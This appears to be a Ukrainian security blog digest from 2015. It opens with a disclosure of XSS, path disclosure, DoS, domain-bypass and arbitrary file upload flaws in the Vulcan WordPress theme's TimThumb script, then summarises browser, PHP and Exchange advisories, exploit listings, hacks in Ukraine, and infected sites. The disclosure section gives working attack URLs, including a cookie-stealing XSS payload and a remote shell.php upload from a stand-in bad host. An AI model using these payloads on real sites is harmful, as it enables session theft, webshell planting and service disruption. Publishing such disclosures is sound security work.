Websecurity - Веб безпека

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Vulcan для WordPress. Ці уразливості аналогічні тим, що я знайшов в темах для WP ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні).

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Vulcan для WordPress (в останніх версіях виправлені лише уразливості в TimThumb, але все ще є FPD в інших php-файлах).

У версіях TimThumb до 2.8, де виправлена XSS, наявні всі інші уразливості. А починаючи з версії 2.8 виправлені всі уразливості. Але дірки AoF і DoS виправлені шляхом заборони зовнішніх хостів по замовчуванню. Якщо змінити налаштування (дозволити окремі чи всі зовнішні хости), що програма дозволяє, то знову можна буде проводити атаки на інші сайти. На деяких сайтах не оновлена версія TimThumb в темі, але вони захищаються WAF (як ModSecurity). Зазначу, що WAF не захистить від FPD дірок в цій темі та TimThumb, а в деяких випадках не захистить від AoF і DoS.

У травні, 14.05.2015, вийшов Mozilla Firefox 38.0.1. Нова версія браузера вийшла через 2 дні після виходу Firefox 38.

Це секюріті та багфікс випуск в якому виправлені баги, а також вибивання браузера. Мозіла не зарахувала цей crash до уразливостей, а до багів, як вона це дуже часто робить.

А у червні, 02.06.2015, вийшов Mozilla Firefox 38.0.5. Це коригувальний випуск в якому виправлені баги та доданий новий функціонал (Reader View, спільний доступ до вікна чи вкладки у клієнті Hello, інтеграція сервісу Pocket).

• Релиз Firefox 38.0.5 с режимом читателя и поддержкой сервиса Pocket (деталі)

Виявлені численні уразливості безпеки в Microsoft Internet Explorer.

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8, 9, 10, 11 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7, Windows 8, Windows 2012 Server, Windows 8.1.

Численні пошкодження пам’яті.

• Microsoft Security Bulletin MS15-056 - Critical Cumulative Security Update for Internet Explorer (3058515) (деталі)

В даній добірці експлоіти в веб додатках:

• D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change (деталі)
• ManageEngine Asset Explorer 6.1 - Stored XSS (деталі)
• Endian Firewall < 3.0.0 - OS Command Injection (Python PoC) (деталі)
• Endian Firewall < 3.0.0 - OS Command Injection (Metasploit Module) (деталі)
• Adobe Flash Player Drawing Fill Shader Memory Corruption (деталі)

У червні, 11.06.2015, вийшли PHP 5.4.42, PHP 5.5.26 і PHP 5.6.10. У версії 5.4.42 виправлено 9 уразливостей, у версіях 5.5.26 і 5.6.10 виправлено декілька багів і 14 уразливостей.

Дані релізи направлені на покращення безпеки і стабільності гілок 5.4.x, 5.5.x і 5.6.x.

У PHP 5.4.42, 5.5.26 і 5.6.10 виправлено:

• Виправлено 6 уразливостей.
• Уразливості в модулях Opcache, Phar, Postgres.
• Бібліотека sqlite оновлена до версії 3.8.10.2, в якій виправлені 3 уразливості.
• Бібліотека pcrelib оновлена до версії 8.37, в якій виправлені 2 уразливості (в PHP 5.5.26 і 5.6.10).

По матеріалам http://www.php.net.

Раніше я писав про травневі DDoS атаки та взломи в Україні, а зараз розповім про ситуацію у червні.

В зв’язку з сепаратистськими і терористичними акціями на сході України хакерська активність була значною. Відбулися наступні DDoS атаки та взломи в Інтернеті.

Іноземними хакерами були проведені неполітичні взломи:

ivfdai.gov.ua (хакерами з SecurityCrewz) - 03.06.2015

Проукраїнськими хакерами були атаковані наступні сайти:

tribunal-today.ru (Українські Кібер Війська) - 12.06.2015
Червневі DDoS атаки на сайти ДНР і ЛНР

Сайти ДНР і ЛНР були атаковані неодноразово на протязі червня.

Українські Кібер Війська закрили наступні сайти:

Закритий сайт tribunal24.ru (через скаргу хостеру) - 06.2015
Закритий сайт ukrnod.su (через скаргу хостеру) - 06.2015
Закритий сайт inespravy.sk (через скаргу хостеру) - 06.2015
Закритий сайт russkie-fond.ru (через скаргу хостеру) - 06.2015
Закритий сайт lnr-portal.su (через скаргу хостеру) - 06.2015

Виявлені численні уразливості безпеки в Microsoft Exchange.

Уразливі версії: Microsoft Exchange Server 2013 SP1 і Cumulative Update 8.

XSS, ін’єкція HTML, CSRF та SSRF.

• Microsoft Security Bulletin MS15-064 - Important Vulnerabilities in Microsoft Exchange Server Could Allow Elevation of Privilege (3062157) (деталі)

В даній добірці уразливості в веб додатках:

• XML External Entity vulnerability in libsvg (деталі)
• Vulnerabilities in phpMyAdmin (деталі)
• Python CGIHTTPServer File Disclosure and Potential Code Execution (деталі)
• Endeca Latitude Cross-Site Scripting (деталі)
• ASUS AiCloud Enabled Routers 12 Models - Authentication bypass and Sensitive file/path disclosure (деталі)

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://patoka.in.ua - інфекція була виявлена 30.06.2015. Зараз сайт входить до переліку підозрілих.
• http://globalmarket.com.ua - інфекція була виявлена 23.06.2015. Зараз сайт не входить до переліку підозрілих.
• http://patoka.ua - 30.06.2015. Зараз сайт входить до переліку підозрілих.
• http://forbs.com.ua - 30.06.2015. Зараз сайт не входить до переліку підозрілих.
• http://dominanta-ukr.com - 30.06.2015. Зараз сайт не входить до переліку підозрілих.

Виявлені численні уразливості безпеки в Mozilla Firefox, Thunderbird, Seamonkey.

Уразливі продукти: Mozilla Firefox ESR 31.6, Firefox 37, Thunderbird 31.6, SeaMonkey 2.34.

Численні переповнення буфера, пошкодження пам’яті, розкриття інформації, обхід обмежень.

• MFSA 2015-46 Miscellaneous memory safety hazards (деталі)
• MFSA 2015-47 Buffer overflow parsing H.264 video with Linux Gstreamer (деталі)
• MFSA 2015-48 Buffer overflow with SVG content and CSS (деталі)
• MFSA 2015-49 Referrer policy ignored when links opened by middle-click and context menu (деталі)
• MFSA 2015-50 Out-of-bounds read and write in asm.js validation (деталі)
• MFSA 2015-51 Use-after-free during text processing with vertical text enabled (деталі)
• MFSA 2015-52 Sensitive URL encoded information written to Android logcat (деталі)
• MFSA 2015-53 Use-after-free due to Media Decoder Thread creation during shutdown (деталі)
• MFSA 2015-54 Buffer overflow when parsing compressed XML (деталі)
• MFSA 2015-55 Buffer overflow and out-of-bounds read while parsing MP4 video metadata (деталі)
• MFSA 2015-56 Untrusted site hosting trusted page can intercept webchannel responses (деталі)
• MFSA 2015-57 Privilege escalation through IPC channel messages (деталі)
• MFSA 2015-58 Mozilla Windows updater can be run outside of application directory (деталі)